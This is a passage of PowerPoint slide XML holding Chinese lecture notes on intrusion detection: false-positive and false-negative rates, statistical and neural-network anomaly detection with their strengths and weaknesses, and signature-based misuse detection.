              <a:t>具体来说，以上三个方面的衡量可以归纳为很多细节的指标。</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针对入侵检测系统，还有两个非常重要的概念。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>就是漏报和误报。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRP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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>所谓误报，英文的愿意为“假阳性”。将一个正常的网络行为错误的判断为入侵行为，就是“误报”。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>所谓漏报，英文的愿意为“假阴性”。将一个真是的网络入侵行为，判断为合法行为，称之为“漏报”。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRP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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在评价</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>系统时，我们往往使用漏报率和误报率来评价</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>系统。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一般我们使用如下的公式来进行计算。但是对于漏报率和误报率的计算和测试方法，目前还没有权威统一的方法，众多方法的主要差异在于分母的取值。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>例如：有的计算方法针对事件危害性的不同，给不同的事件赋予不同的权值，利用权值之和来计算误报率、漏报率等等。大家可以参考相应的文献。</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448C87-023D-4E49-B603-34FECE4E8D7D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3947470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上一小节我们讨论</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>分类时，依据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>系统检测方法将其分为两类，一类是异常检测原理模型，一类是误用检测原理模型。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>接下来我们首先讨论异常检测原理。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>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dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>异常检测被称为基于行为的入侵检测。其工作原理是首先</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>收集操作活动的历史数据，建立代表主机、用户或网络连接的正常行为描述库。</a:t>
            </a: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sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>然后使用一些方法判断当前检测到的事件活动是否偏离了正常行为模式，从而判断是否发生入侵。</a:t>
            </a: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sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>异常检测的优点非常明显，它能够检测到未知的入侵行为；但是其缺点就是系统的误报率较高。</a:t>
            </a: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进行异常检测的有一个假设前提，即</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>入侵行为是异常活动的子集 。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>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在这一前提的指引下，入侵检测系统首先将建立正常用户的轮廓，将其表达为各种行为参数及其阈值的一个集合。</a:t>
            </a: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在进行入侵检测时，首先对用户行为进行监控，并在此基础上进行参数的量化，并与用户轮廓进行比较，依据比较结果进行行为合法性的判定。</a:t>
            </a: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同时，在不断的监控用户行为的同时对用户轮廓进行修正，以适应用户的行为习惯。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3448683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因此，异常检测具有如下地特点：</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dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>异常检测系统的效率取决于用户轮廓的完备性和监控的频率。</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dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>因为不需要对每种入侵行为进行定义，因此</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>能有效检测未知的入侵。</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dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>最后，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>系统能针对用户行为的改变进行自我调整和优化，但随着检测模型的逐步精确，异常检测会消耗更多的系统资源。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>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47450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关注网络安全动态的同学们可能有这样的感觉：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络入侵似乎越来越容易了！为什么呢？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一方面，目前网络上的网络入侵教程随处可见；即使正式出版物中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>黑客宝典</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>黑客秘籍</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>之类的书籍也是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>大把大把的存在。</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在异常检测中，如果建立用户轮廓时整个系统地核心。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>具体来说，可以采用这样地一些方法。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>第一，就是基于统计分析地方法建立用户轮廓。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>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dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>统计分析法首先</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>对系统或用户的行为按照一定的时间间隔进行采样，采样的内容包括每个会话的登录、退出情况，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>和内存的占用情况，硬盘等存储介质的使用情况等；然后对每次采集到的样本进行计算，得出一系列的参数变量来对这些行为进行描述，得到系统和用户的正常行为轮廓；</a:t>
            </a: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统计分析异常检测优点在于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>所应用的方法在统计学中已经比较成熟。</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而且，它</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以“学习”用户的使用习惯，从而具有较高检测率和可用性。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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en-US" altLang="zh-CN" sz="14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400" dirty="0"/>
              <a:t>但是其不足也同样明显。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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2800" dirty="0"/>
              <a:t>一是计算量非常大，合适指标的选取很困难，异常阈值难以确定；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="28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4800" dirty="0"/>
              <a:t>二是它的“学习”能力也给了入侵者一个机会，可以通过逐步“训练”改变正常用户轮廓，使入侵事件符合正常操作的统计规律。 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="48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4800" dirty="0"/>
              <a:t>最后一个就是，他对事件发生的次序不敏感。</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zh-CN" altLang="en-US" sz="28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400" dirty="0"/>
              <a:t> </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zh-CN" altLang="en-US" sz="1200" dirty="0"/>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2200993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神经网络是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>一种算法，通过学习已有的输入／输出信息对，抽象出其内在的关系，然后通过归纳得到新的输入／输出对。</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神经网络异常检测是将神经网络用于对系统和用户行为的学习。学习归纳用户输入命令的方式，得到用户行为的轮廓框架。</a:t>
            </a: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这样可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>根据用户已执行的命令来预测用户要输入的下一条命令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>，如果通过预测得到的命令与用户随后输入的命令不一致，表明用户的行为与其轮廓框架产生了偏离，可以判断有入侵行为发生。</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神经网络异常检测的优势在于：</a:t>
            </a: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sz="1200" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不需要对数据进行统计假设，可以较好地处理原始数据的随机性和干扰数据；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、也能自动学习，具有灵活性、容错性和并行性。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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t>其不足主要表现在：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"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sz="1200" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>神经网络是“黑盒”建模，模型的解释能力很差，不能提供一个对入侵的解释，因此也不能很好地利用已有的经验知识来指导网络的学习。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>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en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、必须经过多次尝试才能确定网络拓扑结构和各元素的权重；</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dirty="0"/>
              <a:t> </a:t>
            </a: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endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>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787268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其它还有模式预测模型、数据挖掘模型、马尔可夫过程模型、时间序列分析模型等等很多异常检测方法，其目标就是建立正常用户轮廓，在这里就不在一一赘述了。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>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1619002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总结一下异常检测方法。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>它的优点非常明显：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、能够检测未知的网络入侵；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、较少依赖特定的主机操作系统</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、能够内部合法用户的越权行为。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>它的缺点也同样明显：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、具有较高的误报率；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、建立正常用户轮廓比较困难；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>最后就是难以对入侵行为进行分类。</a:t>
            </a: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489220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dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>另外一种是误用检测。</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dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>误用检测被称为基于知识的入侵检测。其工作原理是首先假定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>所有入侵都能够表达为一种模式特征，并对已知的入侵行为和手段进行分析，提取检测特征，构建攻击特征库。然后通过对比当前状态与攻击特征库的匹配来判断入侵行为。</a:t>
            </a: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endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18"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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>误用检测的优点非常明显，它能够准确的检测已知的入侵行为，误报率低；但是其缺点就是不能检测未知入侵。</a:t>
            </a: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接下来，我们聊一聊误用检测。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>进行误用检测的假设前提是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333399"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>所有的入侵行为都有可被检测到的特征 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>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在这一前提的指引下，入侵检测系统首先需要构建一个入侵行为的特征库。</a:t>
            </a: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在进行入侵检测时，首先对用户行为进行监控，在此基础上提取用户行为的特征，并将其与特征库中的特征进行匹配，依据匹配结果判定是否入侵。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3932773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如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>入侵特征与正常的用户行为能匹配，则系统会发生</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>误报</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>；如果没有特征能与某种新的攻击行为匹配，则系统会发生</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>漏报。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>采用特征匹配的误用模式</a:t>
